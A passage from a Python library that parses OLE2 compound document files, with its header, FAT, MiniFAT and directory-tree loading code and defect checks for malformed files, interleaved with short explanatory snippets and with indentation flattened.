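The struct format above can be checked directly: with '<' (little-endian, standard sizes) each 128-byte directory entry unpacks to 14 fields. A zero-filled entry is used purely for illustration:

```python
import struct

# Directory entry layout, as described in the field-by-field comments:
STRUCT_DIRENTRY = '<64sHBBIII16sIQQIII'
assert struct.calcsize(STRUCT_DIRENTRY) == 128

fields = struct.unpack(STRUCT_DIRENTRY, b'\x00' * 128)
print(len(fields))  # 14 fields: name, namelength, type, color, 3 SIDs,
                    # CLSID, flags, 2 timestamps, isectStart, sizeLow, sizeHigh
```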
def __init__(self, entry, sid, olefile):
"""
Constructor for an _OleDirectoryEntry object.
Parses a 128-bytes entry from the OLE Directory stream.
entry : string (must be 128 bytes long)
sid : index of this directory entry in the OLE file directory
olefile: OleFileIO containing this directory entry
"""
self.sid = sid
# ref to olefile is stored for future use
self.olefile = olefile
# kids is a list of children entries, if this entry is a storage:
# (list of _OleDirectoryEntry objects)
self.kids = []
# kids_dict is a dictionary of children entries, indexed by their
# name in lowercase: used to quickly find an entry, and to detect
# duplicates
self.kids_dict = {}
# flag used to detect if the entry is referenced more than once in
# directory:
self.used = False
# decode DirEntry
(
name,
namelength,
self.entry_type,
self.color,
self.sid_left,
self.sid_right,
self.sid_child,
clsid,
self.dwUserFlags,
self.createTime,
self.modifyTime,
self.isectStart,
sizeLow,
sizeHigh
) = struct.unpack(_OleDirectoryEntry.STRUCT_DIRENTRY, entry)
if self.entry_type not in [STGTY_ROOT, STGTY_STORAGE, STGTY_STREAM, STGTY_EMPTY]:
olefile._raise_defect(DEFECT_INCORRECT, 'unhandled OLE storage type')
# only first directory entry can (and should) be root:
if self.entry_type == STGTY_ROOT and sid != 0:
olefile._raise_defect(DEFECT_INCORRECT, 'duplicate OLE root entry')
if sid == 0 and self.entry_type != STGTY_ROOT:
olefile._raise_defect(DEFECT_INCORRECT, 'incorrect OLE root entry')
#debug (struct.unpack(fmt_entry, entry[:len_entry]))
# name should be at most 31 unicode characters + null character,
# so 64 bytes in total (31*2 + 2):
if namelength>64:
olefile._raise_defect(DEFECT_INCORRECT, 'incorrect DirEntry name length')
# if exception not raised, namelength is set to the maximum value:
namelength = 64
# only characters without ending null char are kept:
name = name[:(namelength-2)]
# name is converted from unicode to Latin-1:
self.name = _unicode(name)
debug('DirEntry SID=%d: %s' % (self.sid, repr(self.name)))
debug(' - type: %d' % self.entry_type)
debug(' - sect: %d' % self.isectStart)
debug(' - SID left: %d, right: %d, child: %d' % (self.sid_left,
self.sid_right, self.sid_child))
# sizeHigh is only used for 4K sectors, it should be zero for 512 bytes
# sectors, BUT apparently some implementations set it as 0xFFFFFFFF, 1
# or some other value so it cannot be raised as a defect in general:
if olefile.sectorsize == 512:
if sizeHigh != 0 and sizeHigh != 0xFFFFFFFF:
debug('sectorsize=%d, sizeLow=%d, sizeHigh=%d (%X)' %
(olefile.sectorsize, sizeLow, sizeHigh, sizeHigh))
olefile._raise_defect(DEFECT_UNSURE, 'incorrect OLE stream size')
self.size = sizeLow
        else:
            # Python ints are arbitrary-precision, so no long() is needed
            # (long is undefined on Python 3):
            self.size = sizeLow + (sizeHigh << 32)
debug(' - size: %d (sizeLow=%d, sizeHigh=%d)' % (self.size, sizeLow, sizeHigh))
self.clsid = _clsid(clsid)
# a storage should have a null size, BUT some implementations such as
# Word 8 for Mac seem to allow non-null values => Potential defect:
if self.entry_type == STGTY_STORAGE and self.size != 0:
olefile._raise_defect(DEFECT_POTENTIAL, 'OLE storage with size>0')
# check if stream is not already referenced elsewhere:
if self.entry_type in (STGTY_ROOT, STGTY_STREAM) and self.size>0:
if self.size < olefile.minisectorcutoff \
and self.entry_type==STGTY_STREAM: # only streams can be in MiniFAT
# ministream object
minifat = True
else:
minifat = False
olefile._check_duplicate_stream(self.isectStart, minifat)
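The name decoding above can be sketched in isolation (decode_direntry_name is a hypothetical helper, not the module's _unicode, which also handles Python 2/3 differences; this sketch assumes the name field is plain UTF-16LE):

```python
# Sketch: a directory entry name is a 64-byte UTF-16LE buffer, and
# namelength counts bytes *including* the 2-byte null terminator.
def decode_direntry_name(raw64, namelength):
    if namelength > 64:
        raise ValueError('incorrect DirEntry name length')
    # drop the null terminator, then decode from UTF-16LE:
    return raw64[:namelength - 2].decode('utf-16-le')

# 'Root Entry' is 10 characters: 10*2 bytes + 2-byte terminator = 22
raw = 'Root Entry'.encode('utf-16-le').ljust(64, b'\x00')
print(decode_direntry_name(raw, 22))  # Root Entry
```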
def build_storage_tree(self):
"""
Read and build the red-black tree attached to this _OleDirectoryEntry
object, if it is a storage.
Note that this method builds a tree of all subentries, so it should
only be called for the root object once.
"""
debug('build_storage_tree: SID=%d - %s - sid_child=%d'
% (self.sid, repr(self.name), self.sid_child))
if self.sid_child != NOSTREAM:
# if child SID is not NOSTREAM, then this entry is a storage.
# Let's walk through the tree of children to fill the kids list:
self.append_kids(self.sid_child)
# Note from OpenOffice documentation: the safest way is to
# recreate the tree because some implementations may store broken
# red-black trees...
# in the OLE file, entries are sorted on (length, name).
# for convenience, we sort them on name instead:
# (see rich comparison methods in this class)
self.kids.sort()
def append_kids(self, child_sid):
"""
Walk through red-black tree of children of this directory entry to add
all of them to the kids list. (recursive method)
child_sid : index of child directory entry to use, or None when called
first time for the root. (only used during recursion)
"""
#[PL] this method was added to use simple recursion instead of a complex
# algorithm.
# if this is not a storage or a leaf of the tree, nothing to do:
if child_sid == NOSTREAM:
return
# check if child SID is in the proper range:
if child_sid<0 or child_sid>=len(self.olefile.direntries):
self.olefile._raise_defect(DEFECT_FATAL, 'OLE DirEntry index out of range')
# get child direntry:
child = self.olefile._load_direntry(child_sid) #direntries[child_sid]
debug('append_kids: child_sid=%d - %s - sid_left=%d, sid_right=%d, sid_child=%d'
% (child.sid, repr(child.name), child.sid_left, child.sid_right, child.sid_child))
# the directory entries are organized as a red-black tree.
# (cf. Wikipedia for details)
# First walk through left side of the tree:
self.append_kids(child.sid_left)
# Check if its name is not already used (case-insensitive):
name_lower = child.name.lower()
if name_lower in self.kids_dict:
self.olefile._raise_defect(DEFECT_INCORRECT,
"Duplicate filename in OLE storage")
# Then the child_sid _OleDirectoryEntry object is appended to the
# kids list and dictionary:
self.kids.append(child)
self.kids_dict[name_lower] = child
# Check if kid was not already referenced in a storage:
if child.used:
self.olefile._raise_defect(DEFECT_INCORRECT,
'OLE Entry referenced more than once')
child.used = True
# Finally walk through right side of the tree:
self.append_kids(child.sid_right)
# Afterwards build kid's own tree if it's also a storage:
child.build_storage_tree()
def __eq__(self, other):
"Compare entries by name"
return self.name == other.name
def __lt__(self, other):
"Compare entries by name"
return self.name < other.name
def __ne__(self, other):
return not self.__eq__(other)
def __le__(self, other):
return self.__eq__(other) or self.__lt__(other)
# Reflected __lt__() and __le__() will be used for __gt__() and __ge__()
#TODO: replace by the same function as MS implementation ?
# (order by name length first, then case-insensitive order)
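The TODO above refers to Microsoft's ordering; a hypothetical sort key implementing it (name length first, then case-insensitive comparison) could look like this sketch, which is not the module's current behavior:

```python
# Hypothetical key matching the ordering described in the TODO:
# shorter names sort first, ties broken case-insensitively.
def ms_direntry_key(name):
    return (len(name), name.upper())

names = ['b', 'A', 'aa', 'B']
print(sorted(names, key=ms_direntry_key))  # ['A', 'b', 'B', 'aa']
```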
def dump(self, tab = 0):
"Dump this entry, and all its subentries (for debug purposes only)"
TYPES = ["(invalid)", "(storage)", "(stream)", "(lockbytes)",
"(property)", "(root)"]
print(" "*tab + repr(self.name), TYPES[self.entry_type], end=' ')
if self.entry_type in (STGTY_STREAM, STGTY_ROOT):
print(self.size, "bytes", end=' ')
print()
if self.entry_type in (STGTY_STORAGE, STGTY_ROOT) and self.clsid:
print(" "*tab + "{%s}" % self.clsid)
for kid in self.kids:
kid.dump(tab + 2)
def getmtime(self):
"""
Return modification time of a directory entry.
return: None if modification time is null, a python datetime object
otherwise (UTC timezone)
new in version 0.26
"""
if self.modifyTime == 0:
return None
return filetime2datetime(self.modifyTime)
def getctime(self):
"""
Return creation time of a directory entry.
        return: None if creation time is null, a python datetime object
        otherwise (UTC timezone)
new in version 0.26
"""
if self.createTime == 0:
return None
return filetime2datetime(self.createTime)
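filetime2datetime (defined elsewhere in this module) converts a 64-bit FILETIME, i.e. a count of 100-nanosecond intervals since 1601-01-01 UTC. A minimal standalone equivalent, for illustration only:

```python
from datetime import datetime, timedelta

def filetime_to_datetime(ft):
    # FILETIME counts 100-ns ticks since 1601-01-01 (UTC);
    # // 10 converts ticks to microseconds for timedelta
    return datetime(1601, 1, 1) + timedelta(microseconds=ft // 10)

# the Unix epoch expressed as a FILETIME value:
print(filetime_to_datetime(116444736000000000))  # 1970-01-01 00:00:00
```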
#--- OleFileIO ----------------------------------------------------------------
class OleFileIO:
"""
OLE container object
This class encapsulates the interface to an OLE 2 structured
storage file. Use the {@link listdir} and {@link openstream} methods to
access the contents of this file.
Object names are given as a list of strings, one for each subentry
level. The root entry should be omitted. For example, the following
code extracts all image streams from a Microsoft Image Composer file::
ole = OleFileIO("fan.mic")
for entry in ole.listdir():
            if entry[1:2] == ["Image"]:
                fin = ole.openstream(entry)
                fout = open(entry[0], "wb")
while True:
s = fin.read(8192)
if not s:
break
fout.write(s)
You can use the viewer application provided with the Python Imaging
Library to view the resulting files (which happens to be standard
TIFF files).
"""
def __init__(self, filename = None, raise_defects=DEFECT_FATAL):
"""
Constructor for OleFileIO class.
filename: file to open.
raise_defects: minimal level for defects to be raised as exceptions.
(use DEFECT_FATAL for a typical application, DEFECT_INCORRECT for a
security-oriented application, see source code for details)
"""
# minimal level for defects to be raised as exceptions:
self._raise_defects_level = raise_defects
# list of defects/issues not raised as exceptions:
# tuples of (exception type, message)
self.parsing_issues = []
if filename:
self.open(filename)
def _raise_defect(self, defect_level, message, exception_type=IOError):
"""
This method should be called for any defect found during file parsing.
It may raise an IOError exception according to the minimal level chosen
for the OleFileIO object.
defect_level: defect level, possible values are:
DEFECT_UNSURE : a case which looks weird, but not sure it's a defect
DEFECT_POTENTIAL : a potential defect
DEFECT_INCORRECT : an error according to specifications, but parsing can go on
DEFECT_FATAL : an error which cannot be ignored, parsing is impossible
message: string describing the defect, used with raised exception.
exception_type: exception class to be raised, IOError by default
"""
# added by [PL]
if defect_level >= self._raise_defects_level:
raise exception_type(message)
else:
# just record the issue, no exception raised:
self.parsing_issues.append((exception_type, message))
def open(self, filename):
"""
Open an OLE2 file.
Reads the header, FAT and directory.
filename: string-like or file-like object
"""
#[PL] check if filename is a string-like or file-like object:
# (it is better to check for a read() method)
if hasattr(filename, 'read'):
# file-like object
self.fp = filename
else:
# string-like object: filename of file on disk
#TODO: if larger than 1024 bytes, this could be the actual data => BytesIO
self.fp = open(filename, "rb")
# old code fails if filename is not a plain string:
#if isinstance(filename, (bytes, basestring)):
# self.fp = open(filename, "rb")
#else:
# self.fp = filename
# obtain the filesize by using seek and tell, which should work on most
# file-like objects:
#TODO: do it above, using getsize with filename when possible?
#TODO: fix code to fail with clear exception when filesize cannot be obtained
self.fp.seek(0, os.SEEK_END)
try:
filesize = self.fp.tell()
finally:
self.fp.seek(0)
self._filesize = filesize
# lists of streams in FAT and MiniFAT, to detect duplicate references
# (list of indexes of first sectors of each stream)
self._used_streams_fat = []
self._used_streams_minifat = []
header = self.fp.read(512)
if len(header) != 512 or header[:8] != MAGIC:
self._raise_defect(DEFECT_FATAL, "not an OLE2 structured storage file")
# [PL] header structure according to AAF specifications:
##Header
##struct StructuredStorageHeader { // [offset from start (bytes), length (bytes)]
##BYTE _abSig[8]; // [00H,08] {0xd0, 0xcf, 0x11, 0xe0, 0xa1, 0xb1,
## // 0x1a, 0xe1} for current version
##CLSID _clsid; // [08H,16] reserved must be zero (WriteClassStg/
## // GetClassFile uses root directory class id)
##USHORT _uMinorVersion; // [18H,02] minor version of the format: 33 is
## // written by reference implementation
##USHORT _uDllVersion; // [1AH,02] major version of the dll/format: 3 for
## // 512-byte sectors, 4 for 4 KB sectors
##USHORT _uByteOrder; // [1CH,02] 0xFFFE: indicates Intel byte-ordering
##USHORT _uSectorShift; // [1EH,02] size of sectors in power-of-two;
## // typically 9 indicating 512-byte sectors
##USHORT _uMiniSectorShift; // [20H,02] size of mini-sectors in power-of-two;
## // typically 6 indicating 64-byte mini-sectors
##USHORT _usReserved; // [22H,02] reserved, must be zero
##ULONG _ulReserved1; // [24H,04] reserved, must be zero
##FSINDEX _csectDir; // [28H,04] must be zero for 512-byte sectors,
## // number of SECTs in directory chain for 4 KB
## // sectors
##FSINDEX _csectFat; // [2CH,04] number of SECTs in the FAT chain
##SECT _sectDirStart; // [30H,04] first SECT in the directory chain
##DFSIGNATURE _signature; // [34H,04] signature used for transactions; must
## // be zero. The reference implementation
## // does not support transactions
##ULONG _ulMiniSectorCutoff; // [38H,04] maximum size for a mini stream;
## // typically 4096 bytes
##SECT _sectMiniFatStart; // [3CH,04] first SECT in the MiniFAT chain
##FSINDEX _csectMiniFat; // [40H,04] number of SECTs in the MiniFAT chain
##SECT _sectDifStart; // [44H,04] first SECT in the DIFAT chain
##FSINDEX _csectDif; // [48H,04] number of SECTs in the DIFAT chain
##SECT _sectFat[109]; // [4CH,436] the SECTs of first 109 FAT sectors
##};
# [PL] header decoding:
# '<' indicates little-endian byte ordering for Intel (cf. struct module help)
fmt_header = '<8s16sHHHHHHLLLLLLLLLL'
header_size = struct.calcsize(fmt_header)
debug( "fmt_header size = %d, +FAT = %d" % (header_size, header_size + 109*4) )
header1 = header[:header_size]
(
self.Sig,
self.clsid,
self.MinorVersion,
self.DllVersion,
self.ByteOrder,
self.SectorShift,
self.MiniSectorShift,
self.Reserved, self.Reserved1,
self.csectDir,
self.csectFat,
self.sectDirStart,
self.signature,
self.MiniSectorCutoff,
self.MiniFatStart,
self.csectMiniFat,
self.sectDifStart,
self.csectDif
) = struct.unpack(fmt_header, header1)
debug( struct.unpack(fmt_header, header1))
if self.Sig != MAGIC:
# OLE signature should always be present
self._raise_defect(DEFECT_FATAL, "incorrect OLE signature")
if self.clsid != bytearray(16):
# according to AAF specs, CLSID should always be zero
self._raise_defect(DEFECT_INCORRECT, "incorrect CLSID in OLE header")
debug( "MinorVersion = %d" % self.MinorVersion )
debug( "DllVersion = %d" % self.DllVersion )
if self.DllVersion not in [3, 4]:
# version 3: usual format, 512 bytes per sector
# version 4: large format, 4K per sector
self._raise_defect(DEFECT_INCORRECT, "incorrect DllVersion in OLE header")
debug( "ByteOrder = %X" % self.ByteOrder )
if self.ByteOrder != 0xFFFE:
# For now only common little-endian documents are handled correctly
self._raise_defect(DEFECT_FATAL, "incorrect ByteOrder in OLE header")
# TODO: add big-endian support for documents created on Mac ?
self.SectorSize = 2**self.SectorShift
debug( "SectorSize = %d" % self.SectorSize )
if self.SectorSize not in [512, 4096]:
self._raise_defect(DEFECT_INCORRECT, "incorrect SectorSize in OLE header")
if (self.DllVersion==3 and self.SectorSize!=512) \
or (self.DllVersion==4 and self.SectorSize!=4096):
self._raise_defect(DEFECT_INCORRECT, "SectorSize does not match DllVersion in OLE header")
self.MiniSectorSize = 2**self.MiniSectorShift
debug( "MiniSectorSize = %d" % self.MiniSectorSize )
if self.MiniSectorSize not in [64]:
self._raise_defect(DEFECT_INCORRECT, "incorrect MiniSectorSize in OLE header")
if self.Reserved != 0 or self.Reserved1 != 0:
self._raise_defect(DEFECT_INCORRECT, "incorrect OLE header (non-null reserved bytes)")
debug( "csectDir = %d" % self.csectDir )
if self.SectorSize==512 and self.csectDir!=0:
self._raise_defect(DEFECT_INCORRECT, "incorrect csectDir in OLE header")
debug( "csectFat = %d" % self.csectFat )
debug( "sectDirStart = %X" % self.sectDirStart )
debug( "signature = %d" % self.signature )
# Signature should be zero, BUT some implementations do not follow this
# rule => only a potential defect:
if self.signature != 0:
self._raise_defect(DEFECT_POTENTIAL, "incorrect OLE header (signature>0)")
debug( "MiniSectorCutoff = %d" % self.MiniSectorCutoff )
debug( "MiniFatStart = %X" % self.MiniFatStart )
debug( "csectMiniFat = %d" % self.csectMiniFat )
debug( "sectDifStart = %X" % self.sectDifStart )
debug( "csectDif = %d" % self.csectDif )
# calculate the number of sectors in the file
# (-1 because header doesn't count)
self.nb_sect = ( (filesize + self.SectorSize-1) // self.SectorSize) - 1
debug( "Number of sectors in the file: %d" % self.nb_sect )
# file clsid (probably never used, so we don't store it)
clsid = _clsid(header[8:24])
self.sectorsize = self.SectorSize #1 << i16(header, 30)
self.minisectorsize = self.MiniSectorSize #1 << i16(header, 32)
self.minisectorcutoff = self.MiniSectorCutoff # i32(header, 56)
# check known streams for duplicate references (these are always in FAT,
# never in MiniFAT):
self._check_duplicate_stream(self.sectDirStart)
# check MiniFAT only if it is not empty:
if self.csectMiniFat:
self._check_duplicate_stream(self.MiniFatStart)
# check DIFAT only if it is not empty:
if self.csectDif:
self._check_duplicate_stream(self.sectDifStart)
# Load file allocation tables
self.loadfat(header)
        # Load directory. This sets both the direntries list (ordered by sid)
# and the root (ordered by hierarchy) members.
self.loaddirectory(self.sectDirStart)#i32(header, 48))
self.ministream = None
self.minifatsect = self.MiniFatStart #i32(header, 60)
def close(self):
"""
close the OLE file, to release the file object
"""
self.fp.close()
def _check_duplicate_stream(self, first_sect, minifat=False):
"""
        Check that a stream has not already been referenced elsewhere.
This method should only be called once for each known stream, and only
if stream size is not null.
first_sect: index of first sector of the stream in FAT
minifat: if True, stream is located in the MiniFAT, else in the FAT
"""
if minifat:
debug('_check_duplicate_stream: sect=%d in MiniFAT' % first_sect)
used_streams = self._used_streams_minifat
else:
debug('_check_duplicate_stream: sect=%d in FAT' % first_sect)
# some values can be safely ignored (not a real stream):
if first_sect in (DIFSECT,FATSECT,ENDOFCHAIN,FREESECT):
return
used_streams = self._used_streams_fat
#TODO: would it be more efficient using a dict or hash values, instead
# of a list of long ?
if first_sect in used_streams:
self._raise_defect(DEFECT_INCORRECT, 'Stream referenced twice')
else:
used_streams.append(first_sect)
def dumpfat(self, fat, firstindex=0):
        "Display part of the FAT in human-readable form, for debugging purposes"
# [PL] added only for debug
if not DEBUG_MODE:
return
        # dictionary to convert special FAT values into human-readable strings
        VPL = 8  # values per line (8+1 * 8+1 = 81)
fatnames = {
FREESECT: "..free..",
ENDOFCHAIN: "[ END. ]",
FATSECT: "FATSECT ",
DIFSECT: "DIFSECT "
}
nbsect = len(fat)
nlines = (nbsect+VPL-1)//VPL
print("index", end=" ")
for i in range(VPL):
print("%8X" % i, end=" ")
print()
for l in range(nlines):
index = l*VPL
print("%8X:" % (firstindex+index), end=" ")
for i in range(index, index+VPL):
if i>=nbsect:
break
sect = fat[i]
if sect in fatnames:
nom = fatnames[sect]
else:
if sect == i+1:
nom = " --->"
else:
nom = "%8X" % sect
print(nom, end=" ")
print()
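The special FAT values printed above are fixed by the OLE2 format; a standalone sketch of the same labelling (the module defines FREESECT, ENDOFCHAIN, FATSECT and DIFSECT elsewhere, with these spec values):

```python
FREESECT   = 0xFFFFFFFF  # unallocated sector
ENDOFCHAIN = 0xFFFFFFFE  # end of a sector chain
FATSECT    = 0xFFFFFFFD  # sector used by the FAT itself
DIFSECT    = 0xFFFFFFFC  # sector used by the DIFAT

def fat_label(value):
    # return a fixed-width human-readable label for a FAT entry
    names = {FREESECT: '..free..', ENDOFCHAIN: '[ END. ]',
             FATSECT: 'FATSECT ', DIFSECT: 'DIFSECT '}
    return names.get(value, '%8X' % value)

print(fat_label(0xFFFFFFFE))  # [ END. ]
print(fat_label(0x2A))        # '      2A'
```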
def dumpsect(self, sector, firstindex=0):
        "Display a sector in human-readable form, for debugging purposes."
if not DEBUG_MODE:
return
VPL=8 # number of values per line (8+1 * 8+1 = 81)
tab = array.array(UINT32, sector)
nbsect = len(tab)
nlines = (nbsect+VPL-1)//VPL
print("index", end=" ")
for i in range(VPL):
print("%8X" % i, end=" ")
print()
for l in range(nlines):
index = l*VPL
print("%8X:" % (firstindex+index), end=" ")
for i in range(index, index+VPL):
if i>=nbsect:
break
sect = tab[i]
nom = "%8X" % sect
print(nom, end=" ")
print()
def sect2array(self, sect):
"""
convert a sector to an array of 32 bits unsigned integers,
swapping bytes on big endian CPUs such as PowerPC (old Macs)
"""
a = array.array(UINT32, sect)
# if CPU is big endian, swap bytes:
if sys.byteorder == 'big':
a.byteswap()
return a
def loadfat_sect(self, sect):
"""
Adds the indexes of the given sector to the FAT
sect: string containing the first FAT sector, or array of long integers
return: index of last FAT sector.
"""
# a FAT sector is an array of ulong integers.
if isinstance(sect, array.array):
# if sect is already an array it is directly used
fat1 = sect
else:
# if it's a raw sector, it is parsed in an array
fat1 = self.sect2array(sect)
self.dumpsect(sect)
# The FAT is a sector chain starting at the first index of itself.
for isect in fat1:
#print("isect = %X" % isect)
if isect == ENDOFCHAIN or isect == FREESECT:
# the end of the sector chain has been reached
break
# read the FAT sector
s = self.getsect(isect)
# parse it as an array of 32 bits integers, and add it to the
# global FAT array
nextfat = self.sect2array(s)
self.fat = self.fat + nextfat
return isect
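Once loaded, the FAT maps each sector index to the next sector of its chain, which is how streams are reassembled. A toy sketch over a plain list (a real implementation should also guard against circular chains):

```python
ENDOFCHAIN = 0xFFFFFFFE  # spec value marking the end of a chain

def walk_chain(fat, start):
    # follow next-sector pointers until ENDOFCHAIN
    sectors = []
    sect = start
    while sect != ENDOFCHAIN:
        sectors.append(sect)
        sect = fat[sect]
    return sectors

# sectors 0 -> 1 -> 4 -> end; sectors 2 -> 3 form another chain
fat = [1, 4, 3, ENDOFCHAIN, ENDOFCHAIN]
print(walk_chain(fat, 0))  # [0, 1, 4]
print(walk_chain(fat, 2))  # [2, 3]
```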
def loadfat(self, header):
"""
Load the FAT table.
"""
        # The header contains the sector numbers of the first 109 FAT sectors.
        # Additional FAT sectors are described by DIFAT blocks.
sect = header[76:512]
debug( "len(sect)=%d, so %d integers" % (len(sect), len(sect)//4) )
#fat = []
# [PL] FAT is an array of 32 bits unsigned ints, it's more effective
# to use an array than a list in Python.
# It's initialized as empty first:
self.fat = array.array(UINT32)
self.loadfat_sect(sect)
#self.dumpfat(self.fat)
## for i in range(0, len(sect), 4):
## ix = i32(sect, i)
## #[PL] if ix == -2 or ix == -1: # ix == 0xFFFFFFFE or ix == 0xFFFFFFFF:
## if ix == 0xFFFFFFFE or ix == 0xFFFFFFFF:
## break
## s = self.getsect(ix)
## #fat = fat + [i32(s, i) for i in range(0, len(s), 4)]
## fat = fat + array.array(UINT32, s)
if self.csectDif != 0:
# [PL] There's a DIFAT because file is larger than 6.8MB
# some checks just in case:
if self.csectFat <= 109:
# there must be at least 109 blocks in header and the rest in
# DIFAT, so number of sectors must be >109.
self._raise_defect(DEFECT_INCORRECT, 'incorrect DIFAT, not enough sectors')
if self.sectDifStart >= self.nb_sect:
# initial DIFAT block index must be valid
self._raise_defect(DEFECT_FATAL, 'incorrect DIFAT, first index out of range')
debug( "DIFAT analysis..." )
# We compute the necessary number of DIFAT sectors :
# (each DIFAT sector = 127 pointers + 1 towards next DIFAT sector)
nb_difat = (self.csectFat-109 + 126)//127
debug( "nb_difat = %d" % nb_difat )
if self.csectDif != nb_difat:
raise IOError('incorrect DIFAT')
isect_difat = self.sectDifStart
for i in iterrange(nb_difat):
debug( "DIFAT block %d, sector %X" % (i, isect_difat) )
#TODO: check if corresponding FAT SID = DIFSECT
sector_difat = self.getsect(isect_difat)
difat = self.sect2array(sector_difat)
self.dumpsect(sector_difat)
self.loadfat_sect(difat[:127])
# last DIFAT pointer is next DIFAT sector:
isect_difat = difat[127]
debug( "next DIFAT sector: %X" % isect_difat )
# checks:
if isect_difat not in [ENDOFCHAIN, FREESECT]:
# last DIFAT pointer value must be ENDOFCHAIN or FREESECT
raise IOError('incorrect end of DIFAT')
## if len(self.fat) != self.csectFat:
## # FAT should contain csectFat blocks
## print("FAT length: %d instead of %d" % (len(self.fat), self.csectFat))
## raise IOError('incorrect DIFAT')
# since FAT is read from fixed-size sectors, it may contain more values
# than the actual number of sectors in the file.
# Keep only the relevant sector indexes:
if len(self.fat) > self.nb_sect:
debug('len(fat)=%d, shrunk to nb_sect=%d' % (len(self.fat), self.nb_sect))
self.fat = self.fat[:self.nb_sect]
debug('\nFAT:')
self.dumpfat(self.fat)
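The DIFAT sizing rule checked in loadfat can be expressed on its own: the header stores 109 FAT sector pointers, and each DIFAT sector stores 127 more plus a link to the next DIFAT sector. A sketch of the arithmetic:

```python
def difat_sector_count(csectFat):
    # the first 109 FAT-sector pointers fit in the header; each DIFAT
    # sector then holds 127 pointers (the 128th is the next-DIFAT link)
    if csectFat <= 109:
        return 0
    return (csectFat - 109 + 126) // 127

print(difat_sector_count(109))  # 0
print(difat_sector_count(110))  # 1
print(difat_sector_count(237))  # 2
```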
def loadminifat(self):
"""
Load the MiniFAT table.
"""
# MiniFAT is stored in a standard sub-stream, pointed to by a header
# field.
# NOTE: there are two sizes to take into account for this stream:
# 1) Stream size is calculated according to the number of sectors
# declared in the OLE header. This allocated stream may be more than
# needed to store the actual sector indexes.
# (self.csectMiniFat is the number of sectors of size self.SectorSize)
stream_size = self.csectMiniFat * self.SectorSize
# 2) Actually used size is calculated by dividing the MiniStream size
# (given by root entry size) by the size of mini sectors, *4 for
# 32 bits indexes:
nb_minisectors = (self.root.size + self.MiniSectorSize-1) // self.MiniSectorSize
used_size = nb_minisectors * 4
debug('loadminifat(): minifatsect=%d, nb FAT sectors=%d, used_size=%d, stream_size=%d, nb MiniSectors=%d' %
(self.minifatsect, self.csectMiniFat, used_size, stream_size, nb_minisectors))
if used_size > stream_size:
# This is not really a problem, but may indicate a wrong implementation:
self._raise_defect(DEFECT_INCORRECT, 'OLE MiniStream is larger than MiniFAT')
# In any case, first read stream_size:
s = self._open(self.minifatsect, stream_size, force_FAT=True).read()
#[PL] Old code replaced by an array:
#self.minifat = [i32(s, i) for i in range(0, len(s), 4)]
self.minifat = self.sect2array(s)
# Then shrink the array to used size, to avoid indexes out of MiniStream:
debug('MiniFAT shrunk from %d to %d sectors' % (len(self.minifat), nb_minisectors))
self.minifat = self.minifat[:nb_minisectors]
debug('loadminifat(): len=%d' % len(self.minifat))
debug('\nMiniFAT:')
self.dumpfat(self.minifat)
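The two sizes compared in loadminifat can be computed independently; a sketch assuming the typical 512-byte sectors and 64-byte mini-sectors:

```python
def minifat_sizes(csectMiniFat, root_stream_size,
                  sector_size=512, mini_sector_size=64):
    # 1) bytes allocated for the MiniFAT stream itself:
    stream_size = csectMiniFat * sector_size
    # 2) bytes actually needed: one 32-bit index per mini-sector in use,
    #    where the mini-sector count is derived from the root entry size
    nb_minisectors = (root_stream_size + mini_sector_size - 1) // mini_sector_size
    used_size = nb_minisectors * 4
    return stream_size, used_size

print(minifat_sizes(1, 4096))  # (512, 256): one MiniFAT sector, 64 indexes used
```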
def getsect(self, sect):
"""
Read given sector from file on disk.
sect: sector index
returns a string containing the sector data.
"""
# [PL] this original code was wrong when sectors are 4KB instead of
# 512 bytes:
#self.fp.seek(512 + self.sectorsize * sect)
#[PL]: added safety checks:
#print("getsect(%X)" % sect)
try:
self.fp.seek(self.sectorsize * (sect+1))
        except Exception:
debug('getsect(): sect=%X, seek=%d, filesize=%d' %
(sect, self.sectorsize*(sect+1), self._filesize))
self._raise_defect(DEFECT_FATAL, 'OLE sector index out of range')
sector = self.fp.read(self.sectorsize)
if len(sector) != self.sectorsize:
debug('getsect(): sect=%X, read=%d, sectorsize=%d' %
(sect, len(sector), self.sectorsize))
self._raise_defect(DEFECT_FATAL, 'incomplete OLE sector')
return sector
def loaddirectory(self, sect):
"""
Load the directory.
sect: sector index of directory stream.
"""
# The directory is stored in a standard
# substream, independent of its size.
# open directory stream as a read-only file:
# (stream size is not known in advance)
self.directory_fp = self._open(sect)
#[PL] to detect malformed documents and avoid DoS attacks, the maximum
# number of directory entries can be calculated:
max_entries = self.directory_fp.size // 128
debug('loaddirectory: size=%d, max_entries=%d' %
(self.directory_fp.size, max_entries))
# Create list of directory entries
#self.direntries = []
# We start with a list of "None" object
self.direntries = [None] * max_entries
## for sid in iterrange(max_entries):
## entry = fp.read(128)
## if not entry:
## break
## self.direntries.append(_OleDirectoryEntry(entry, sid, self))
# load root entry:
root_entry = self._load_direntry(0)
# Root entry is the first entry:
self.root = self.direntries[0]
# read and build all storage trees, starting from the root:
self.root.build_storage_tree()
def _load_direntry (self, sid):
"""
Load a directory entry from the directory.
This method should only be called once for each storage/stream when
loading the directory.
sid: index of storage/stream in the directory.
return: a _OleDirectoryEntry object
        raise: IOError if the entry has already been referenced.
"""
# check if SID is OK:
if sid<0 or sid>=len(self.direntries):
self._raise_defect(DEFECT_FATAL, "OLE directory index out of range")
# check if entry was already referenced:
if self.direntries[sid] is not None:
self._raise_defect(DEFECT_INCORRECT,
"double reference for OLE stream/storage")
# if exception not raised, return the object
return self.direntries[sid]
self.directory_fp.seek(sid * 128)
entry = self.directory_fp.read(128)
self.direntries[sid] = _OleDirectoryEntry(entry, sid, self)
return self.direntries[sid]
def dumpdirectory(self):
"""
Dump directory (for debugging only)
"""
self.root.dump()
def _open(self, start, size = 0x7FFFFFFF, force_FAT=False):
"""
Open a stream, either in FAT or MiniFAT according to its size.
(openstream helper)
start: index of first sector
size: size of stream (or nothing if size is unknown)
force_FAT: if False (default), stream will be opened in FAT or MiniFAT
according to size. If True, it will always be opened in FAT.
"""
debug('OleFileIO.open(): sect=%d, size=%d, force_FAT=%s' %
(start, size, str(force_FAT)))
# stream size is compared to the MiniSectorCutoff threshold:
if size < self.minisectorcutoff and not force_FAT:
# ministream object
if not self.ministream:
# load MiniFAT if it wasn't already done:
self.loadminifat()
# The first sector index of the miniFAT stream is stored in the
# root directory entry:
size_ministream = self.root.size
debug('Opening MiniStream: sect=%d, size=%d' %
(self.root.isectStart, size_ministream))
self.ministream = self._open(self.root.isectStart,
size_ministream, force_FAT=True)
